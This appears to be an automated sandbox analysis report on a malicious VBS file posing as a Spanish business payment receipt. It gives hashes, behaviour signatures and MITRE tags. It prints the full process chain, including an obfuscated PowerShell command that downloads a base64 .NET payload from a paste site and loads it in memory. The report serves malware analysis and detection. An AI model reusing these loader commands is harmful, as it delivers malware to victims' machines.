4287a4d23b855bf6ce9ff903998b58468c9dbf03255e486cda93f0115957edbf

General

Target

DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs
Size

205KB
MD5

a922f12891bb10b7fa058b7974950de6
SHA1

5a7e081ae52a26ebc08b0076493a73afbc58fc9e
SHA256

4287a4d23b855bf6ce9ff903998b58468c9dbf03255e486cda93f0115957edbf
SHA512

2d6f4865ccbe9b99113d7568aeeb0e6e6250f9cde87227ea5efc5aaee8aa1758679f02c046c6396feece1c9fd5607415403578bec90583ee4e7aa6a08506b5e3

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pasteio.com/download/xc3Ey7lGXuPW

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 1732 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

1760 powershell.exe
1732 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1760 powershell.exe
Token: SeDebugPrivilege 1732 powershell.exe

flow	pid	process
4	1732	powershell.exe

pid	process
1760	powershell.exe
1732	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1760	powershell.exe
Token: SeDebugPrivilege	1732	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 1772 wrote to memory of 1760	1772	WScript.exe	powershell.exe
PID 1772 wrote to memory of 1760	1772	WScript.exe	powershell.exe
PID 1772 wrote to memory of 1760	1772	WScript.exe	powershell.exe
PID 1760 wrote to memory of 1732	1760	powershell.exe	powershell.exe
PID 1760 wrote to memory of 1732	1760	powershell.exe	powershell.exe
PID 1760 wrote to memory of 1732	1760	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAE8ASQBVAEcAdwAlACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AG⌚⌚⌚AaQBvAC4AYwBvAG0ALwBkAG8AdwBuAGwAbwBhAGQALwB4AGMAMwBFAHkANwBsAEcAWAB1AFAAVwAnACkAKQA7AFsAcwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH⌚⌚⌚AcgByAG⌚⌚⌚AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG⌚⌚⌚AKAAnAE4AdwBnAG8AeABNAC4ASwBQAEoAYQBOAGoAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFAAVQBsAEcASwBBACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH⌚⌚⌚AbABsACwAIABbAG8AYgBqAG⌚⌚⌚AYwB0AFsAXQBdACAAKAAnAHcATgA4AE8AOQBFAGQAOQBxAFAA⌚⌚⌚gB4AC8AZABhAG8AbABuAHcAbwBkAC8AbQBvAGMALgBvAGkAZQB0AHMAYQBwAC8ALwA6AHMAcAB0AHQAaAAnACAALAAgACQA⌚⌚⌚gBvAGQAYQBDAG8AcAB5ACAALAAgACcARQA5AE8AOABOAHcAJwAgACkAKQA=';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('%OIUGw%', 'C:\Users\Admin\AppData\Local\Temp\DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pasteio.com/download/xc3Ey7lGXuPW'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('wN8O9Ed9qPRx/daolnwod/moc.oietsap//:sptth' , $RodaCopy , 'E9O8Nw' ))"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1732

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
00d0d7f40247fef8e477f3dcc5777664

SHA1
9b50d0e1415cdfbbc37ddc2ef86cdcff31e45383

SHA256
5c2910083f9eb223bf7ff0b6dd79a8096fad7a87bfde82d74a90dba9f41923df

SHA512
661be78aea8541ad645e330c6cb4eb81bd9c58ed6dd500ceaaed8bc88a86dfdb43c29fb8d69f3165ef72d43445e90d11fde787ab029649d34932a50e30bc9de7

Download Submit
memory/1732-68-0x00000000024EB000-0x000000000250A000-memory.dmp

Filesize
124KB

Download
memory/1732-67-0x00000000024E4000-0x00000000024E7000-memory.dmp

Filesize
12KB

Download
memory/1732-70-0x00000000024EB000-0x000000000250A000-memory.dmp

Filesize
124KB

Download
memory/1732-69-0x00000000024E4000-0x00000000024E7000-memory.dmp

Filesize
12KB

Download
memory/1732-65-0x000007FEF2CB0000-0x000007FEF380D000-memory.dmp

Filesize
11.4MB

Download
memory/1732-61-0x0000000000000000-mapping.dmp

Download
memory/1732-64-0x000007FEF3810000-0x000007FEF4233000-memory.dmp

Filesize
10.1MB

Download
memory/1760-55-0x0000000000000000-mapping.dmp

Download
memory/1760-60-0x000000001B7D0000-0x000000001BACF000-memory.dmp

Filesize
3.0MB

Download
memory/1760-66-0x000000000296B000-0x000000000298A000-memory.dmp

Filesize
124KB

Download
memory/1760-57-0x000007FEF3810000-0x000007FEF4233000-memory.dmp

Filesize
10.1MB

Download
memory/1760-58-0x000007FEF2CB0000-0x000007FEF380D000-memory.dmp

Filesize
11.4MB

Download
memory/1760-59-0x0000000002964000-0x0000000002967000-memory.dmp

Filesize
12KB

Download
memory/1760-71-0x0000000002964000-0x0000000002967000-memory.dmp

Filesize
12KB

Download
memory/1760-72-0x000000000296B000-0x000000000298A000-memory.dmp

Filesize
124KB

Download
memory/1772-54-0x000007FEFBCE1000-0x000007FEFBCE3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing